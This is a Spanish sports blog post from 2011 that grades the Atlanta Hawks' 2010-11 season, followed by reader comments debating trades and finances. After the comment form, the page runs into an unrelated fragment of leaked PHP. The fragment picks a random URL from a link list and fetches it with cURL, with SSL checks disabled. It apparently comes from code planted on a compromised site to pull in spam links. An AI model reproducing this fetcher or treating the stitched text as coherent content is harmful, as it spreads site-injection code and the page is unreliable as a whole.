Atlanta Hawks: Notable

03 de July de 2011 por Hynreck

A comienzos de temporada les pronosticamos como cuartos del este y que su techo y su objetivo serían las semifinales de conferencia. Nos equivocamos por poco: fueron quintos en el este, pero sí que llegaron hasta semifinales de conferencia, dando la campanada en primera ronda al dejar por el camino a Dwigth Howard & Cia. Hasta ahí les llegó la gasolina., los Bulls fueron demasiado para ellos. Unas finales de conferencia, realmente, les vienen algo grandes.

Aún así buena temporada una vez más para los Hawks, asentados entre la clase noble de la liga con un muy buen quinteto, mejorado aún más a mitad de temporada con la llegada de Kirk Hinrich y la salida del cada vez más inconsistente Mike Bibby. Joe Johnson no ha tenido una mala temporada pero su salario es desproporcionado, acorde a una superestrella que él no es. Josh Smith sigue siendo más de lo mismo. No llegaremos a decir que es talento desperdiciado pues su rendimiento es más que notable pero su toma de decisiones, su estúpido enamoramiento con el tiro exterior y su I.Q. baloncestístico son puntos fundamentales a mejorar. Al Horford también viene de una buena temporada. Puntos, rebotes, intimidación…nada que reprocharle. Igual que a Jamaal Crawford, gran rendimiento desde el banquillo con mucho protagonismo en los momentos importantes.

Con todo esto, les ha llegado para un notable. Siguen teniendo las mismas virtudes  que a principio de temporada, pero también los mismos defectos. La vida sigue igual por Atlanta.

Lo mejor: El rendimiento de Al Horford que cada año mejora un poquito más. Uno de los internos más valiosos de la competición. La aportación de Jamaal Crawford desde el banquillo en los momentos importantes.

Lo peor: Marvin Williams no solo no evoluciona sino que este año ha dado un paso atrás. El contrato de Joe Johnson les impedirá moverse en el mercado de agentes libres los próximos años.

Jugando a GM

La renovación de Jamaal Crawford es más que complicada. Su salida implicaría el primer paso hacia una reconstrucción difícil pero hacia ahí dirigiremos nuestros tiros. Sin Crawford habría que deshacerse de Marvin Williams. Intentaríamos un  trade con Charlotte por Boris Diaw, quien podría ofrecer su rol de combo-forward, y quién sabe si recuperar  su nivel de Phoenix, siendo expiring al finalizar la temporada que viene.

Comenta

8 comentarios a esta entrada

  1. safd dice:
    #1

    “Hasta ahí les llegó la gasolina.”
    Esque a ver, si te vas a enfrentar al equipo líder de la liga regular, que tiene el MVP, cuya posición es de base, y en el partido anterior de playoffs, se nos lesiona el mejor guard en cuanto a defensa… mala suerte xd. Rose promedió casi 30 puntos, así era imposible. Alomejor hubiesemos perdio, alomejor nos hubiese promediado 30 puntos, pero no hubiese sido igual…

    Hynreck, no se porque no nombras al que va a ser nuestro rookie particular en 2011/2012, Teague, que después de las pedazo de semifinales de conferencia que se marcó (15-4-3) con partidos de más de 20 puntos, después de una temporada en la que ni llegaba a 14mpp, va a tener muchos minutos este año, y algunos creen incluso que será el titular y que Hinrich saldrá del banquillo.
    También se habla de que Pape Sy tendrá minutos este año y no lo van a enviar a la D-League, y de que están intentando que nuestra segunda ronda de este año, Keith Benson, gane kilos, porque el tío mide 2,11 (2,23 de envergadura) y pesa 105 kilos. Por lo que he visto no parece malo, sabe tirar con las dos manos y el tio tapona bien, este año acabó promediando 3 el bicho, y con 105k… con eso ya es mejor que los demás interiores del banquillo de Atlanta XD. Si tuviese esos 10 kilos que necesita ya ganados, hubiese sido primera ronda sin duda, los interiores que miden 2,11 pesan 115K y promedian 17-10-3 algunos son hasta lottery picks… a ver si lo podemos mandar con Shaq, que ahora que se va a vivir a Orlando lo tiene Benson cerca pa que le enseñe a comer bien XD.

    Criticas mucho a Josh Smith, pero esque es de los pocos motivos por los que va mucha gente a ver los partidos de Atlanta…

    En cuanto a Jugando a GM, el tema de renovar a Jamaal ya se ha hablado mucho en Atlanta, y no se va a renovar, por dos razones:
    -El presupuesto es de 70 millones de euros y los Hawks tienen 65 comprometidos en 9 jugadores, vamos que no hay pasta xd. Aunque yo creo que si se consiguiese una superestrella como Howard, el presupuesto podría aumentar a 75-78 porque los beneficios en cuanto a merchandising y to eso serían muchísimo superiores. Y más si fuese superman, que es de Atlanta.
    -Porque habría que renovarlo por unos 10K y el presupuesto es de 70, es decir, se gastaría en el backcourt casi 40K… no XD

    Yo haría el trade del qeu hablé en el post de los Magic:
    Kirk Hinrich + Al Horford + 3 segundas rondas (Suns-Hawks-Hawks/Houston) por JJRedick + Superman

    Renovaría a los que son agentes libres este año (menos a Jamaal)

    Y ficharía por la Mid-Level a JJBarea, que sería o 6ºhombre o titular.

    Con este quinteto: Teague-JJ-Marvin-Josh Smith-Howard y con JJBarea JJRedick (bueno, Sy también tendrá muchos minutos) y las pufo torres del banquillo para dar descanso, deberíamos luchar por algo más, no solo por la final de conferencia…

    Sund, consigue un trade con Superman, por tu madre XD

      Citar

  2. KB #24 dice:
    #2

    Sadf! Te digo yo que los magics prefieren k howard se les vaya gratis antes k venderlo x hinrich y horford!! y las 3 segundas rondas esas pintan muy poco para un presumible equipo candidato al anillo, a la vez que hipotecan a los hawks en un futuro sin jovenes.

      Citar

  3. Esteban dice:
    #3

    me parece a mi o solo SARFD ve a atlanta como un equipo de elite? ajajajajja

      Citar

  4. Mariano dice:
    #4

    No se olviden de Jeff Teague, que tuvo algunos flashes de revelación cuando Hinrich se lesionó.. nos sorprendió a todos este joven..

      Citar

  5. JHC dice:
    #5

    Para mi tambn es un ekipo de elite, si tuviera alguien k se dejara el dinero seria de lo mejorcito pues la base Horford – Smith es una gran pareja a la k se le podria acompañar con alguna estrella y mejor rotacion de banquillo k al fin y al cabo es lo k les falta

      Citar

  6. Esteban dice:
    #6

    JHC, si no tienen banquillo no pueden ser equipo de elite

    les anticipo:

    crawford no renueva
    joe jhonson en poco tiempo empezara a sacarle lagrimas su gm por su salario, 24 millones la ultima temporada? quien es? howard?
    carne de primera ronda del proximo año, y decayendo en los años siguientes

      Citar

  7. Txusma dice:
    #7

    Los Hawks nunca han tenido opciones reales de ganar un anillo y llega el momento de decidirse. Ponemos toda la carne en el asador (y vamos a por Howard, por ejemplo)? o empezamos a pensar en el futuro (y intentamos engañar a alguien con Joe Johson)?

      Citar

  8. safd dice:
    #8

    @Esteban, seguimos teniendo más banquillo que NY… xddd.

    @Mariano, en muchos foros se habla de esto:
    Draft 2011:
    -Jeff Teague
    -Pape Sy
    -Kito Benson

    Para mí no se equivocan xd

    @JHC, esque es una situación complicada económicamente. El ASG (Atlanta Spirit Group) es un conjunto de empresarios que tenían los Trashers y los Hawks, ambos equipos de Atlanta. Después de que hayan vendido los Trashers y de que se vayan a cambiar de ciudad (entre los lockouts y esto no va a haber deporte este año en Atlanta XD), han declarado a los Hawks en venta, y además dicen que pierden dinero constantemente con los Hawks. Hace unos días en un artículo de AJC pusieron de coña como posibles compradores a Mike Woodson, Joe Johnson y a Justin Bieber, jajaja me partí el culo. Si lo comprase Justin Bieber me hago de los Bobcats xd

    @Txusma tu mismo lo dices, esque es un momento clave. Si consiguiesemos a Howard, que nació y se crió en Atlanta, estando en el momento en el que está Atlanta, que se le van los Trashers, se volcaría la ciudad con los Hawks y con las posibilidades de anillo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>